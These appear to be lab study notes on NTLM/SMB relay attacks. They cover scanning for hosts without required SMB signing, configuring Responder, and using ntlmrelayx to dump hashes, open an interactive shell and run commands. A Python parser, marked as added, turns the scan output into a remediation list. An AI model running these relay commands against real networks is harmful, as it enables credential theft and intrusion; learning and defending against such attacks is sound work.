Instead of cracking, PASS/RELAY it to gain access!
By default:
SMB signing is disabled on user accounts
SMB signing is enabled on server accounts
Identify Hosts without SMB Signing:
nmap --script=smb2-security-mode.nse -p445 192.168.218.136 -Pn
-Pn skips host discovery and checks the host anyway
Adjusting Responder:
sudo mousepad /etc/responder/Responder.conf
switch SMB and HTTP to Off, then run Responder
Scanning Domain Controller:
Message signing enabled and REQUIRED. Can’t do it.
Scanning one of the computers:
Message signing enabled but NOT REQUIRED. What we want.
You can run it against the whole subnet and pull out the hosts where signing is not required using grep:
nmap --script=smb2-security-mode.nse -p445 192.168.218.0/24 -Pn | grep not -A 2
DISCORD TIP: USE CME
cme smb 192.168.218.0/24 --gen-relay-list relay.list
Note: SPIDERMAN was offline, that's why it wasn't found!
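To turn the subnet scan into a remediation list, here is an added Python parser, not part of the original notes, that ties each signing status back to its host (the grep above only shows the matching status lines). The nmap output inside it is a constructed sample; 192.168.218.10 and 192.168.218.20 are made-up hosts.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap --script=smb2-security-mode.nse -p445 ...` output.
# 192.168.218.136 is the host from the notes; .10 (a DC) and .20 are made up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.218.136
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.lab.local (192.168.218.10)
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.218.20
445/tcp closed microsoft-ds
"""

# Matches both "report for 1.2.3.4" and "report for name (1.2.3.4)".
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
SIGNING_RE = re.compile(r"Message signing (.+)$")

def parse_signing(nmap_text: str) -> Dict[str, str]:
    """Map each scanned IP to its smb2-security-mode signing status.
    Hosts with no status line (port closed, script not run) are omitted."""
    results: Dict[str, str] = {}
    current = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = SIGNING_RE.search(line)
        if m and current:
            results[current] = m.group(1).strip()
    return results

def hosts_needing_signing(nmap_text: str) -> List[str]:
    """IPs where signing is not enforced: the remediation list for
    'Microsoft network server: Digitally sign communications (always)'."""
    return sorted(
        ip for ip, status in parse_signing(nmap_text).items()
        if "not required" in status or status.startswith("disabled")
    )
```

Hosts whose 445/tcp is closed never get a status line and so do not appear in the map; rescan them separately rather than treating them as fixed.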
relay.list can be used with ntlmrelayx
ntlmrelayx.py -tf relay.list -smb2support
-tf is the target file. It could be relay.list, or targets.txt if we built it the nmap way!
Hashes dumped:
To use interactive mode:
ntlmrelayx.py -tf relay.list -smb2support -i
and listen to it with:
nc 127.0.0.1 11000
You can type help to list the available commands!
Or run a single command instead:
ntlmrelayx.py -tf relay.list -smb2support -c "whoami"